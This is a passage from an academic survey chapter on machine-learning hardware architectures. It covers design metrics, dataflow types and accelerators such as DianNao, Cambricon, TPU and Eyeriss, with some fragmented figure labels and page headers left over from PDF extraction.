computing; even the programming framework of neuromorphic computing is
different from the conventional programming framework. In terms of algorithm,
software framework, and dedicated hardware, real-valued-based ANNs with simple
models are more mature than neuromorphic computing. There are many ANN
models like convolutional neural network (CNN), recurrent neural network (RNN),
and transformer neural network. Along with these ANN models, there are also
mature training algorithms. For example, backpropagation is a widely used training
method. These ANNs can be developed on various software frameworks such as
PyTorch, Keras, TensorFlow, and Darknet. Besides, ANNs can be conveniently
deployed on dedicated hardware such as the GPU and even some ASIC accelerators
like TPU, NPU, and so on. Thanks to these mature algorithms, software frameworks,
and dedicated hardware, nowadays ANNs can outperform human beings in some
tasks, such as recognizing faces and playing chess.
Inspired by the neural network of the brain, ANNs are composed of artificial neu-
rons and connections along with weights. Unlike the neurons in the neuromorphic
computing that mimic the biological neural dynamics, the artificial neurons in the
ANN perform multiply-and-accumulate (i.e., all the inputs of a neuron are weighted
and summed, and normally, a bias is added to this sum) and activation function (i.e.,
normally a nonlinear function). Thus, the model of the ANN is much simpler than
that of event-based neuromorphic computing. The connections in the ANN provide
the output of one neuron as an input to another neuron. Each connection is assigned
a weight representing its relative importance, and these weights are learned during
ANN training.
Even though ANN exploits abstract and fundamental mathematical models of
the findings in neuroscience, its practical advantages have been well recognized
in the machine leaching community, which drives the design of domain-specific
architectures. Surveys in Schuman et al. (2017), Sze et al. (2017), and Chen
et al. (2020) have provided sufficient technology backgrounds in the history of
350 Y. Yang et al.
In this section, we review the important design metrics for ANN accelerator as
illustrated in Fig. 25. Foremost, ANN architecture shares the common design met-
rics as conventional designs in the semiconductor industry, which is functionality
and PPA (performance, power consumption, and silicon area). Accuracy acts as
a specific design metric due to the fact that exactness in ANN computing is less
demanded, since most ANN tasks, e.g., vision and audio are interactively judged
by humans where approximated values are highly acceptable. Consequently, the
designer trades off accuracy with PPA and even functionality to reduce manufacture
cost and time to market. Another critical design metric is ecosystem. Since ANN
accelerators are still in the booming phase, programming framework, system-level
integration strategy, and open-source design templates are essential for standard-
ization. Accelerators lacking programming support for state-of-the-art machine
learning frameworks are unlikely to succeed. Least but not the last, rest metrics such
as reliability, security, and support for design space exploration (DSE) are mostly
at the research stage and will step into industry-level designs in the near future.
SRAM Data
Design metrics with
PE array FPU MAC Memory PIM and PNM
buffers access movement
Memory Area
Non-linear
funcons key concerns for power
Power 3D compung
interfaces
Interconnects
SoC or Chiplet
Novel device
ANN accelerator Arithmec
power
DVFS Data
compression
Novel device
Fig. 25 Design metrics and associated key concerns for ANN accelerator
10 Architectures for Machine Learning 351
We briefly illustrate primary design metrics and associate design concerns in the
following.
memory (PNM) have been demonstrated, where computing and storage are spatially
adjacent; therefore, less data movement can be realized. For instance, PNM style
heterogeneously integrated design, also known as 3D integration, has appeared in
industry accelerators. Novel device such as memoristor and spintronics leads to huge
power saving but is currently facing programmability support.
Silicon Area The data-intensive nature of ANN implies a chip design style filled
with thousands of PEs and associated buffers. Accordingly, PEs and buffers can
easily take up 90% of the silicon area. Since hardware implementation of large
bit-width multiply-and-accumulation and floating point algorithmic and nonlinear
activation functions are very costly in area. Optimization techniques should consider
whether a huge amount of PEs should be designed uniformly or asymmetrically.
An asymmetric design style can greatly reduce area cost however introducing
controlling complexity. Furthermore, to achieve enough output accuracy, various
neural networks have different quantization strategies. Symmetric but parallel data
pipelines are inclined to occupy more than necessary silicon resources since lower-
bit data representations can usually be sufficient. On the contrary, the topology and
size of buffers should be carefully allocated, since small on-chip buffers can have
difficulty in holding minimal demanded activations for large kernels, while huge
buffers are anyway not recommended for cost in fabrication. Novel devices, such
as embedded DRAM, 3D IC, and ReRAM would be essential solutions to achieve
compact and cost-effective design shortly.
From the system-level perspective, typical ANN engines have become huge
in size (James et al. 2020) which suffer both economically and also in terms of
yield. Current system-on-chip implementations are hardly adaptive to such scaling
trend. For domain-specific architectures, chiplet is highly expected to become the
future solution of system integration, where industry standards for inter-chiplet
communication are worth looking forward to.
Accuracy One important difference between ANN architectures and the ones in
other domains is the approximation property of neural networks. Regression and
classification, which are two essential types of NN outputs, both tolerate variations
of intermediate computations within network layers, especially for classification.
Therefore, state-of-the-art inference accelerators adopt low-cost fixed-point com-
putation and data representation to trade-off accuracy for silicon area. However,
such approximation in computing introduces significant design risks, where the
functional correctness of the architecture alone does not guarantee any output
accuracy. Although in reported ANNs targeting vision-based tasks, it is claimed to
have sufficient accuracy by employing an 8-bit integer for intermediate computation,
this is not the rule of thumb for evolving ANNs and larger images. Several
kernels, such as shortcut and route, demand the merging of at least two layers with
different data representations. The careless handle of such kernels can cause a huge
accuracy drop. Recurrent kernels such as GRU and LSTM have a high requirement
in precision due to a large number of network coefficients and sigmoid/tangent
activation functions, which makes small bit-width fixed-point data representation
354 Y. Yang et al.
Ecosystem It is hard for any new accelerator to achieve public popularity. The
challenge not only lies in its functionality and PPA but also mostly in the
compatibility of its tool kits to the existing software and hardware frameworks,
which constitutes the ANN’s ecosystem. Currently, machine learning algorithms are
developed and trained through mainstream frameworks such as Pytorch, Tensorflow,
Keras, and Caffe. For on-site deployment, Darknet, Tensorflow RT, cuDNN, and
PaddlePaddle are adopted to target various computing devices. To bridge the gap
between software framework and physical devices, the Apache TVM compiles
various algorithm descriptions for CPUs, GPUs, and accelerators. From hardware
perspective, Nvidia’s NVDLA is the first opensource machine learning accelerator
which has become the initial RTL template for many industrial designs. The
Versatile Tensor Accelerator (VTA) is an open, generic, and customizable deep
learning accelerator with a complete TVM-based compiler stack. It is reasonably
anticipated that any ANN accelerator lacking compatibility to mainstream software
frameworks can hardly survive, while conservatively following the existing open
design templates will hinder novelty and breakthrough.
Other Metrics Reliability and security are gradually becoming the research
hotspots for ANN architectures as the application domains of ANN stepping into
mission-critical systems. For instance, ANN accelerators used in airplanes and
aerospace demand fault-tolerant to both transient errors and permanent failures
due to highly radiated environments and harsh temperatures. Personalized ANN
models must be guarded against hacking ideally by intrinsic security means in the AI
circuit. The inevitable adoption of ANN in autonomous driving put foremost design
consideration on accelerator safety. Research on the above directions is thriving
rapidly. Current ANN execution models and architectures may possess potential
weaknesses, therefore are subjected to fundamental design updates. Furthermore,
high reliable and secure VLSI designs are extremely valuable and play key roles in
the military and national defense. It is expected that design prototypes targeting
improvements on reliability and security keep appearing soon. Tools for design
space exploration such as engine for neural architecture search (NAS) are also
well researched, which intend for fast identification of ANN structure for specific
application and dataset and are possibly followed by automating the hardware
implementation process such as software toolchain and HDL generation.
10 Architectures for Machine Learning 355
Although ANN hardware architectures are the main focus of the chapter, a success-
ful ANN system demands a complete design flow involving cross-layer abstractions,
as illustrated in Fig. 26.
Application Level Design: The design flow of the ML system originates from
the application level, where the customer or designer provides the application
(e.g., image classification and object detection (Iandola et al. 2016; Wu et al.
2017)) and fixes the constraints (Joulin et al. 2017) (e.g., accuracy, latency, and
power consumption). Although ANN achieves significant performance for selective
application kernels, it cannot be replaced by traditional rule-based algorithms in rest
scenarios. The complete application is usually decomposed into subtasks, where
ANN targets a few of them.
ANN Architecture Design: The ANN model is construct (Krizhevsky et al. 2012;
Iandola et al. 2016) through structural exploration and parameter training. ANN
structure is illustrated by its amount of layers and neurons per layer, operation
types, and interconnects of the individual layer. Network parameters or weights
need to be adjusted through training algorithms (e.g., back-propagation). Various
template ANN models can be used as reference designs, such as Yolo-series for
object detection, MobileNet as classification, and LSTM as voice recognition.
ANN Optimization: The default ANN models are usually large in size of param-
eters, long in execution latency, or high in power consumption and are therefore
Hardware/Software Co-design
Hardware Architecture
356 Y. Yang et al.
hard to meet design constraints. Network optimization techniques have been heavily
researched and practiced to reduce model size. For instance, weight pruning is
adopted to compress the ANN structure such as the number of layers, neurons,
and channels (Sanh et al. 2020), while quantization (Iandola et al. 2016) is used
to shorten the width of data representation. State-of-the-art ANN optimization tech-
niques can achieve 2-orders of magnitude reduction in model size with negligible
accuracy loss.
Frameworks and Libraries: After the ANN models are determined and opti-
mized, they are deployed onto physical devices through various machine learning
frameworks such as Tensorflow and Pytorch. System-level libraries are leveraged to
improve performance on heterogeneous computing architectures, e.g., GPU cuDNN
acceleration libraries (Chetlur et al. 2014). Frameworks and libraries are usually
built and integrated as part of the operating system, which bridges the application
with low-level machine languages.
ANN system designers should understand that enormous gains in design metrics
can be envisioned across design abstractions. At each abstraction level, however,
improvements vary significantly in terms of latency/operations energy and memory,
as summarized in Table 2. We can see that at the application level, by changing
application characteristics, the improvement can reach up to 1000× even with the
same underlying ANN models. For ANN model architectures, one can improve
by the low end of the spectrum (i.e., ∼4×) with negligible accuracy loss and
achieve significant gains (i.e., ∼50×) when allowing little accuracy impact (<4%).
While fixing the application constraints and ANN model architectures, numerous
optimization techniques can be applied to dramatically improve key parameters with
10 Architectures for Machine Learning 357
<0.5% impact on accuracy. Frameworks and libraries provide flexible yet powerful
support to different architectures, which result in enormous improvements with
<0.5% accuracy impact. By closely co-designing hardware and software, one can
get improvements without compromising accuracy, e.g., reducing 24× gate-count
by replacing 32-bit FP MACs with int4 MACs. Even pure hardware architecture
design can gain improvements by 2 − 10×.
In various scenarios, one can gain significant improvements by combining
techniques at different abstraction levels. For example, the customer has determined
the application and ANN model. In this case, one can achieve 12−70× improvement
with ANN optimizations and frameworks. If the accuracy requirements are relaxed,
another 4 − 50× improvement can be gained.
Chen et al. (2014b): The next work in the DianNao series is DaDianNao (“Big
computer” in Chinese), which uses DianNao as submodules to build an on-chip
supercomputer. The bottleneck of design scaling into a supercomputer is the main
memory access, where DaDianNao explored the possibility of localized storage of
ANN weights and activations into on-chip eDRAMs, which breaks the limitation
of memory bandwidth. The design is organized in a two-level hierarchy of tile and
node. Each tile contains the reproduction of DianNao named as neural functional
unit (NFU) and four eDRAM banks, whereas the node contains 16 tiles connected
by an eDRAM router. DaDianNao proposed an aggressive architecture redesign for
ANN and foresaw the potential of performance scaling (450.65× over K20M GPU)
if the memory wall would have been well addressed through advanced memory
technology.
Du et al. (2015): Afterward, ShiDianNao (“Vision computer” in Chinese)
integrated the NFU into the pipeline of the image processor to deploy CNN on
the camera. The incentive of the work was the elimination of costly DRAM access,
which seemed surprising but was practically realizable for benchmarked small-scale
neural networks. Variations of the dataflow for various kernels have been designed
for increased energy efficiency.
Liu et al. (2015): The last member in the DianNao family PuDianNao (“Preva-
lent computer” in Chinese) targeted to increase the supported machine learning
primitives beyond ANN including k-nearest neighbors, k-means, support-vector
machine (SVM), and others. To achieve this, key computational tasks and locality
properties have been extracted for all ML primitives, which guides the augmentation
of NFU into a machine learning unit (MLU) with six pipeline stages. Instruction set
architecture (ISA) was carefully designed to support different ML tasks.
Cambricon Series (Liu et al. 2016): After the commercialization of the DianNao
series, the original DianNao team formally proposed Cambricon as an ISA for
neural networks and demonstrated it on its IP named as Cambricon-ACC. The
motivation was that a variety of and increasing NN kernels had resulted in a huge
expansion of the instruction set, therefore causing significant physical burdens for
the decoder. Inspired by the RISC ISA design principles, Cambricon decomposed
complex instructions (network layers) into shorter ones, which increases the
programming flexibility tremendously. With four types of instructions in the ISA,
which are control, data transfer, computational and logical, a large variation of
ANN tasks, e.g., LSTM, autoencoder, and restricted Boltzmann machine can be
straightforwardly programmed and deployed.
Zhang et al. (2016): As the sizes of NN increased from 650-kilo neurons in
AlexNet (Krizhevsky et al. 2012) to 10 billion in Coates et al. (2013), intensive
computation and memory accesses have been incurred which makes efficiently
processing of state-of-the-art NN on conventional accelerators a challenging prob-
lem. Algorithm designers attempted to optimize NN size through pruning and
distilling, which resulted in sparse neural networks. However, NN accelerators
such as DianNao fail in efficiently processing sparse networks due to missed
architecture supports. To address this, Cambricon-X introduced an efficient indexing
10 Architectures for Machine Learning 359
module (IM) for selecting and transferring only needed neurons from centralized
neuron buffers with reduced bandwidth requirement. Taking advantage of IM,
each PEs stored irregular and compressed synapses for local computation in an
asynchronous fashion, which speeds up the processing of sparse NN.
Zhou et al. (2018): While Cambricon-X handled static synapse sparsity (SSS),
it did not provide architecture supports for static neuron sparsity (SNS) and
dynamic neuron sparsity (DNS) which incurs large physical cause due to the IM
module. To improve this, Cambricon-S aimed at alleviating the irregularity of sparse
networks through a cooperative software/hardware approach. The key observation
for software-based network pruning is that larger weights after training tend to
gather into small clusters, which is called “local convergence.” Taking advantage of
such phenomenon, irregularities in a sparse network could be greatly reduced and
achieve a high compression ratio of 79× for AlexNet. Afterward, hardware modules
such as neuron selector (NSM) and synapse selector (SSM) handle the remaining
irregularity. Other architectures handling network sparsity can be referred to in Han
et al. (2016) and Albericio et al. (2016).
Zhao et al. (2019): As machine learning became pervasive in both domains
of embedded and high-performance computing, it was inevitable to build multi-
instance and many-instance machines based on the baseline Cambricon module.
However, increased parallelism usually came along with increased programming
complexity, which has been previously seen through complicated CPU and GPU
APIs. To increase programming productivity, Cambricon-F introduced a fractal
von Neumann architecture to iteratively manage its components. Specifically, the
sub-nodes of Cambricon-F were still Cambricon-F with the same architecture and
ISA; therefore, multiple hierarchies of Cambricon-F shared the same software stack
thus alleviating the programming complexity. To demonstrate the advancements in
architecture, two Cambricon-F instances with different scales, i.e., F100 and F1,
were benchmarked with 1080Ti and DGX-1 GPUs through the famous Roofline
model (Williams et al. 2009).
Google TPU (Jouppi et al. 2017): Unlike the Cambricon series seeking increased
programmability, Google’s Tensor Processing Unit (TPU) adopted custom ASIC
design styles to increase performance. Out of three generations of TPUs, only the
evaluation of the first generation was reported in detail. TPU-I targeted acceleration
of NN inference and leveraged 64K into systolic array multipliers and 24 MB on-
chip SRAM buffers, which in total accounted for 53% of the die silicon area. It
connected with the host CPU through the PCIe 3.0 bus and utilized DDR3 DRAM
for off-chip main memories. TPU-I was designed with a peak throughput of 92 TOPs
per second; however, the measured performance is far less than the peak one. It was
evaluated that among various machine learning tasks, on average 23% of the MACs
were used which only gives a 21.4% of the peak throughput. The reason for such
low MAC utilization is at least two folds. First, the bandwidth of DDR3 DRAM
is quite low for such a server-level ASIC which significantly impacts the speed of
data supply. Second, various neural networks have different access patterns for both
activations and weights, which causes data access irregularities and further prolongs
360 Y. Yang et al.
the duration for memory access. Admitting that memory bandwidth limits the
performance, TPU-II was released in 2017 with High Bandwidth Memory (HBM)
technology and targeted both inference and training tasks by supporting floating-
point operations. The average performance is 45 TFLOPS and can be arranged into
four-chip modules with 180 TFLOPS. Of these modules, 64 are assembled into
a 256-chip pod with a performance of 11.5 PetaFLOPS. Afterward, TPU-III was
announced in 2018 with twice the performance of a single chip regarding TPU-
II, while the deployable chips in a pod is four times the size, which gives 8×
performance boosting. Details on TPU-II and TPU-III are published in Norrie et al.
(2020).
Eyeriss Series (Chen et al. 2016): Architecture papers for DianNao and TPU
do not provide implementation details. However, innovations in implementation
are essential for energy-efficient design. Dataflow exploration is one of the key
issues in ANN design to improve energy efficiency, where Eyeriss achieves high
OPS/W through its well-known row stationary (RS) dataflow for the convolutional
neural network. RS is designed for system-level energy optimization, especially
for minimizing DRAM access with a four-level memory hierarchy to exploit data
locality. Three forms of data reuse are maximized: convolutional reuse, filter reuse,
and Ifmap reuse. The architecture also exploits statistics of feature maps, which
involves a run-length compression (RLC) codec for compressing zero values and
therefore reducing the amount of DRAM access. The data delivery network-on-
chip (NoC) cooperates with RS dataflow for dynamic data gating, which achieves
single-cycle data delivery to multiple destination PEs and saves the dynamic power
of turned-off PEs. The innovative designs of Eyeriss also include distributed control
logic and local storage inside PE. Furthermore, the data delivery NoC cannot adapt
to support both high-data reuse and high-bandwidth scenarios, which was addressed
in the team’s follow-up work in Chen et al. (2019). Other works for optimizing ANN
dataflow are referred to in Lu et al. (2017) and Kwon et al. (2018).
Thinker Series (Yin et al. 2017): Many prototypes such as Eyeriss are designed
and optimized for convolutional kernels. However, other kernels such as recurrent,
full connection, and scalar operations dominate in computation for networks of
non-vision applications. The Thinker series chips target dynamic reconfiguration
through coarse-grained reconfigurable architecture (CGRA). Thinker-I leverages
output stationary dataflow for hybrid neural networks, targeting all convolutional,
recurrent, and FC kernels. It introduces heterogeneous PE arrays, with general
PEs for MAC functions and super PEs for MAC, pooling, activation, and scalar
operations. PEs support bit-width adaptive computing for both activations and
weights. On-demand array partitioning (ODAP) is proposed to process hybrid
networks in parallel, thus increasing resource utilization. A multibank memory
system employs a fused pattern-based memory banking strategy to exploit data reuse
and reduce redundant memory access.
Yin et al. (2018a): An energy-efficient reconfigurable processor for deep neural
networks with binary/ternary weights and 1/2/4/8/16-bit activations is implemented
10 Architectures for Machine Learning 361
Types of dataflow: Since each MAC operation in the ANN typically requires three
memory reads (weight, activation, and partial sum) and one memory write (updated
partial sum); the bottleneck of ANN accelerators is normally in the memory access.
On the other hand, the energy consumed by the data movement or the memory
access is much higher than that of the computation. For example, the off-chip
large memory DRAM (gigabytes) access requires up to several orders of magnitude
higher energy than an ALU computation. To reduce the energy consumed by
off-chip data movement, several levels of on-chip memory hierarchy have been
introduced in the ANN accelerators, including the SRAM (hundred kilobytes) and
register (a few kilobytes). Thus, accessing SRAM and register consumes one and
two orders less energy than that of DRAM, respectively (Chen et al. 2016).
Unlike the CPU, the dataflow of the ANN accelerator is much more regular.
Therefore, it is possible to design dedicated dataflow, which can leverage memory
hierarchy likes DRAM-SRAM-Register to optimize for the best energy efficiency.
There forms of input data local reuse (inside the PE array) opportunities exist in
the ANN accelerator, i.e., convolutional reuse, feature map reuse, and filter reuse.
For convolutional reuse, activations and filter weights are reused within a given
channel. For feature map reuse, activations are reused across different filters. For
filter reuse, the filter weights are reused across different activations. According to
the data handling characteristic, the ANN dataflows in the recent accelerators can
362 Y. Yang et al.
be briefly classified into no local reuse, weight stationary, output stationary, and row
stationary.
No local reuse: Even though accessing the local registers in the PE is energy
efficient, they are not efficient in terms of area when compared with on-chip
SRAM. While no local reuse dataflow design will increase the memory traffic
as there is no data stays stationary inside the PE array. The ANN accelerator
from UCLA (Zhang et al. 2015) and the DianNao (Chen et al. 2014a) are the two
example designs that adopt no local reuse dataflow. In Zhang et al. (2015), the
filter weights, input activations, and output partial sums are buffered using the
global buffer (implemented in SRAM). In DianNao (Chen et al. 2014a), the PE
array reads filter weights and input activations from the global buffer. However,
special registers have been implemented to store the partial sums to reduce the
energy consumed by accessing partial sums.
Weight stationary: The weight stationary dataflow refers to that the filter weights
are read from DRAM into local registers and stay stationary for many MAC
processing. It is able to minimize the energy consumption of reading filter
weights. The weight stationary dataflow maximizes convolutional and filter reuse
of weights. However, the input activations have to broadcast to all PEs, and the
input and output partial sums are buffered using the global buffer. One example
that implements weight stationary dataflow is the NeuFlow (Gokhale et al. 2014),
where each PE has registers to keep the filter weight during processing. The input
activations are broadcast to all PEs, while the partial sums are accumulated across
the PEs. Some delay storage elements are required to correctly accumulate the
partial sums, and thus, the required local memory is increased.
Output stationary: In order to minimize the energy consumption of partial sums’
movement, output stationary dataflow has been designed in some ANN accel-
erators. In these accelerators, the accumulation of output partial sums stays
stationary inside the PE array, while the filter weights are broadcast to all PEs and
input activations are streamed across the PE array. ShiDianNao (Du et al. 2015)
is a typical ANN accelerator that implements output stationary dataflow. The PEs
fetch the input activations from neighboring PEs both horizontally and vertically.
Delay storage elements are also required to keep data for synchronization. Global
buffers are used to buffer input activations and filter weights fetching from
DRAM. There are some other variants of output stationary dataflow which target
the processing of convolutional layers or fully connected layers (Peemen et al.
2013).
Row stationary: Row stationary dataflow has been proposed in Chen et al. (2016)
to minimize overall energy consumption, by reusing all types of data, i.e.,
activations, filter weights, and partial sums. Each PE is assigned to perform
1D row convolution, and the filter weights are kept stationary in the registers
inside the PE. The input activations are streamed into the PE. These activations
are reused thanks to their overlaps between different sliding windows. While
multiple PEs can be aggregated to process 2D convolution. In the PE array,
filter weights and activations can be reused across multiple PEs horizontally and
10 Architectures for Machine Learning 363
diagonally, respectively. For the partial sums, they can be accumulated across the
PEs vertically, minimizing the data movement of partial sums.
Computation in 3D Memory As ANN grows larger and deeper, the overall system
performance is limited by insufficient memory bandwidth and long access latency.
The well-known realizations of 3D memory such as Hybrid Memory Cube (HMC)
(Jeddeloh and Keeth 2012) and High Bandwidth Memory (HBM) (Lee et al. 2014)
can potentially address such bottleneck due to the massive bandwidth provided
by data access through parallel memory channels, named as vaults. Accordingly,
a computing layer or logic die needs to be placed at the bottom layer of the 3D
memory stack. Furthermore, computing architectures and programming paradigms
with 3D memory need to be carefully designed.
Kim et al. (2016): Neurocube is the first architecture for ANN computing in
HMC. It consists of clusters of processing engines, connected by a 2D mesh network
as a processing tier, which is integrated into 3D with multiple tiers of DRAM. The
PE clusters access multiple vaults in parallel. The operating principle, referred to
as memory-centric computing, embeds specialized state machines within the vault
controllers of HMC to drive data into the PE clusters. The paper presents the basic
architecture and an analysis of the logic tier synthesized in 28 and 15 nm process
technologies.
Gao et al. (2017): TETRIS is proposed to address architectural challenges
provided by HMC and improve energy efficiency for a 3D memory-based ANN
computing system. First, it adopted smaller on-chip buffers with different use to
match the lower cost of main memory access. Second, it explored approaches to
move operations closer to the actual memory locations. Third, it implemented a
dataflow scheduling scheme with equivalent efficiency to the optimal schedules
derived from the exhaustive search. Finally, it presented a hybrid partitioning
scheme that parallelizes the NN layers across multiple vaults in the stack.
Ueyoshi et al. (2018): Although HMC and HBM provide high throughput, their
access latency remains problematic and limits the performance for sparse and
irregular networks. QUEST is a 3D DNN engine designed for agile random data
access incorporating multi-vault SRAMs. It achieves an order of magnitude lower
latency than DRAMs. The 40 nm CMOS QUEST prototype has 24 processing cores
running at 300 MHz, where each core is associated with one 32b-width 4 MB SRAM
vault. Inter-vault data communication is achieved through ThruChip Interface
(Ditzel et al. 2014), which realizes 9.6 Gb/s/vault, combined 28.8 GB/s/module,
R/W data bandwidth in a source synchronous manner.
Judd et al. (2016): Stripes proposed the first ANN architecture whose execution
time scales almost proportionally with the length of the used numerical representa-
tion. STR relies on bit-serial compute units and on the parallelism that is naturally
present within DNNs to improve performance and energy with no accuracy loss. In
addition, STR provides adaptivity enabling on-the-fly trade-offs among accuracy,
performance, and energy.
Albericio et al. (2017): While Stripes tackles the statically ineffectual bits,
Pragmatic’s goal is to exploit both static and dynamic zero bits. It is based on the
statistics that only 8% of the computation is strictly necessary for representative
ANNs. Pragmatic eliminates most of the ineffectual computations on the fly by
using serial-parallel shift-and-add multiplication and skipping the zero bits of the
serial input. To reduce the area overhead, it incorporates several design decisions
which result in a practical design.
Sharma et al. (2018): BitFusion introduces dynamic bit-level fusion/decompo-
sition as a new dimension in the design of DNN accelerators. It constitutes an
array of bit-level processing elements that dynamically fuse to match the bit-width
of individual DNN layers. This flexibility in the architecture enables minimizing
the computation and the communication at the finest granularity possible with no
loss for accuracy. The bit-width reconfiguration leads to a large amount of area and
power overhead as each BitBrick needs to have a shift logic.
Ryu et al. (2019): BitBlade presents a precision-scalable architecture that has a
much smaller overhead for shift-add logic compared to BitFusion. BitBlade reduces
the shift-add logic using the bitwise summation method. While each PE in BitFusion
must have 16 variable shift logics, BitBlade requires only one variable shift logic for
each PE. A 41% reduction in area and a 36–46% reduction in energy are evaluated
compared to BitFusion.
Computation Reuse Current ANN tasks mainly target video and audio data, where
such data exhibit large similarity among multiple frames, or within adjacent pixels
of the same frame. Such insight implies the possibility of computation reuse, which
can be used to improve energy efficiency. Furthermore, the application of reuse
is not limited to the input data. Intermediate feature maps can be also reused for
specific kernels such as residue layers, which reduces off-chip traffic.
Riera et al. (2018): Consecutive frames in audio and video applications demand
back-to-back execution of ANN. Such inputs exhibit a high degree of similarity,
causing the inputs/outputs of the different layers to be extremely similar for
successive frames. It is shown that after linear quantization, 60% of the network
inputs have the same quantized value. An architecture is designed to buffer the
outputs of the different layers and reuse them for the next execution.
Mahmoud et al. (2018): Besides temporal similarity, spatial correlation is also
found in vision applications especially for computational imaging. Diffy exploits
spatial correlation to transparently reduce the number of bits needed to store the
activations and the computations needed to perform. The key approach is to apply
differential convolution, which operates on the delta values instead of the original
activations. It boosts the performance by 7.1× over a value-agnostic accelerator.
10 Architectures for Machine Learning 365
Azizimazreah and Chen (2019): Shortcut activations for residue layers account
for 4% of the total feature map data. They incur a large amount of off-chip memory
access and significant power consumption. This work presents the approach that
“mines” the largely unexplored opportunity of reusing shortcut and feature map
data to reduce off-chip traffic. It introduces the use of logical buffers that are formed
dynamically from a pool of physical buffer banks. Three procedures, namely,
Prolog, Kernel, and Epilog, are proposed for collaboratively allowing shortcut data
to be reused across any number of ANN layers.
different FPGA dies to avoid crossing-dies timing critical paths, TGPA achieves
higher frequency than homogeneous designs. Experiment results show that the
TGPA designs achieve up to 3× latency reduction than homogeneous designs.
Jia et al. (2020): Neural CPU is built on a binary neural network accelerator
with the capability to emulate an in-order RISC-V CPU pipeline. Both the general-
purpose CPU and BNN operations are realized in a single core avoiding the need
for a complex communication interface. A special zero-latency transition scheme
is developed to support seamless switching between CPU and BNN modes by
essentially pipelining the reconfiguration, therefore significantly saving latency
caused by inter-core data transfer. A two-NCPU core SoC chip is designed and
fabricated using 65 nm CMOS technology.
Chen et al. (2021): Based on the observation that pre-processing and buffering
procedure can take up 80% of ANN system latency, this work targets jointly
optimization of three processing stages: Specifically, a frame combination module
to relax the alignment incompatibility issue which reduces pre-processing time; a
parallel img2col module to fetch activations for parallel computing threads, which
reduces buffering time; and three modes of batch inference for various NN layers to
reduce the processing time of multiple images. Up to 75% reduction in the system
latency is benchmarked in selected ANNs.
Tools for ANN Design Space Exploration Designing specific architecture espe-
cially ASIC for ANN is not a trivial task that incorporates cross-layer knowledge
including algorithm, architecture, and circuits. Tools for design space exploration
(DSE) are intended for assisting early estimation of performance, power consump-
tion, latency, and area cost for a given ANN and semiautomatic generation of
implementable designs. DSE tools for general-purpose processors have been used
for decades such as nML (Freericks 1991) and LISA (Chattopadhyay et al. 2008);
similar DSE tool flows have also been recently constructed for ANN inference.
Venkatesan et al. (2019): MAGNet stands for modular accelerator generator for
neural networks. It takes a target application consisting of one or more neural
networks along with hardware constraints as input and produces synthesizable
RTL for a neural network accelerator ASIC as well as valid mappings for running
the target networks on the generated hardware. The MAGNet consists of three
components: MAGNet Designer, MAGNet Mapper, and MAGNet Tuner. The
MAGNet designer consists of a highly configurable architecture template with many
design-time parameters, allowing the generation of DNN accelerators specialized
for specific workloads and use cases. The MAGNet mapper handles the mapping of
different neural networks onto the generated hardware and enables optimization of
mapping strategies at run time. The MAGNet tuner uses Bayesian optimization to
rapidly explore the design space and perform hardware-software co-optimization.
Xu et al. (2020): AutoDNNchip automatically generates optimized DNN accel-
erator implementation given the user-defined DNN models from machine learning
frameworks (e.g., Pytorch), application-driven specifications (e.g., energy and
latency), and resource budget (e.g., size of the processing array and memories). It
consists of two integrated enablers: (1) a Chip Predictor, built on top of a graph-
based accelerator representation, which can accurately and efficiently predict a
DNN accelerator’s energy, throughput, and latency and are based on the DNN
model parameters, hardware configuration, technology-based IPs, and platform
constraints; and (2) a Chip Builder, which can automatically explore the design
space of DNN chips (including IP selection, block configuration, resource balance,
etc.), optimize chip design via the Chip Predictor, and then generate synthesizable
RTL code with optimized dataflows to achieve the target design metrics.
build specific designs for other ANN networks, which are briefly summarized in the
following.
Various techniques are proposed to accelerate recurrent neural networks (RNNs),
such as Efficient Speech Recognition Engine (ESE) using compressed models (Han
et al. 2017), a structure-based compression technique called C-LSTM (Wang et al.
2018), DeltaRNN taking advantage of delta network algorithm (Gao et al. 2018),
and Efficient RNN (E-RNN) based on block-circulant matrix (Li et al. 2019a).
Reinforcement learning (RL) is widely used for decision-making in automation
and robotics. Accelerators have been designed with an array of stochastic synapses
feed input and the feedback path (Amravati et al. 2018), in-memory accelerator with
the policy implemented on ferroelectric tunnel junction (FTJ) memristors (Berdan
et al. 2019), an FPGA-based accelerator called FA3C (Cho et al. 2018), an in-switch
accelerator for distributed multi-node RL (Li et al. 2019b).
To accelerate Bayesian inference, researchers have proposed FPGA accelerators
with the RAM-based Linear Feedback Gaussian Random Number Generator (RLF-
GRNG) and the Bayesian Neural Network-oriented Wallace Gaussian Random
Number Generator (Cai et al. 2018) and parallel Gibbs sampling Markov random
field accelerator (PGMA) (Ko et al. 2020).
The Capsule network is accelerated by PIM-CapsNet based on processing-in-
memory (PIM) with GPU and 3D stacked technologies (Zhang et al. 2020). Super
resolution (SR) acceleration is performed by Fast SR CNN (FSRCNN) consisting
of seven convolutional layers and one deconvolutional layer (Dong et al 2016) and
an SR-CNN processor with a global ring with four local rings and a global ring
controller (Lee et al. 2019).
3D CNNs are accelerated using a template-based architecture that unifies 2D and
3D CNNs and improves the computation using uniform templates (Shen et al. 2018)
and using a 3D CNN accelerator called Morph which fetches data from DRAM for
parallel processing with PEs (Hegde et al. 2018).
The Graph Convolutional Networks (GCNs) have been accelerated by the
following works: GraphACT, where the CPU and FPGA deals with communication-
intensive and compute-intensive tasks (Zeng and Prasanna 2020); Autotuning-
Workload-Balancing GCN (AWB-GCN) which partitions matrices and maps them
to parallel PEs to perform column-wise-product-based Sparse-dense Matrix Mul-
tiplications (SpMMs) (Geng et al. 2020); and HyGCN with aggregation and
combination engine (Yan et al. 2020) and GCNAX that fetches data into SMB and
performs computations of chain SpMM (Li et al. 2021).
Attention-based tasks are accelerated by GOBO consisting of processing tiles
whose data are supplied by a banked global buffer (Zadeh et al. 2020); A3 using
algorithm approximation with modules of dot-product, exponent, and output (Ham
et al. 2020); and FlexASR with 4 PEs and multifunction global buffer where each
PE includes a weight buffer and an input buffer that sends data to perform operations
of LSTM, GRU, or RNN layers (Tambe et al. 2021).
Such computing intensity not only demands significant computing resources but
also seeks high precision. Floating-point arithmetic units are essential in the
process of backpropagation, where fixed-point approximation or customized data
representation for training is still under research. Due to high engineering cost and
design complexity, state-of-the-art training chips are mostly commercial designs
from large companies, where we list renowned VLSI products from three vendors.
Gwennap (2016): Wave dataflow processor (DPU) is a training chip designed
by the Wave Computing company. It is an ASIC design fabricated in TSMC
16 nm FinFET process. The Wave DPU is featured with hybrid dataflow processing
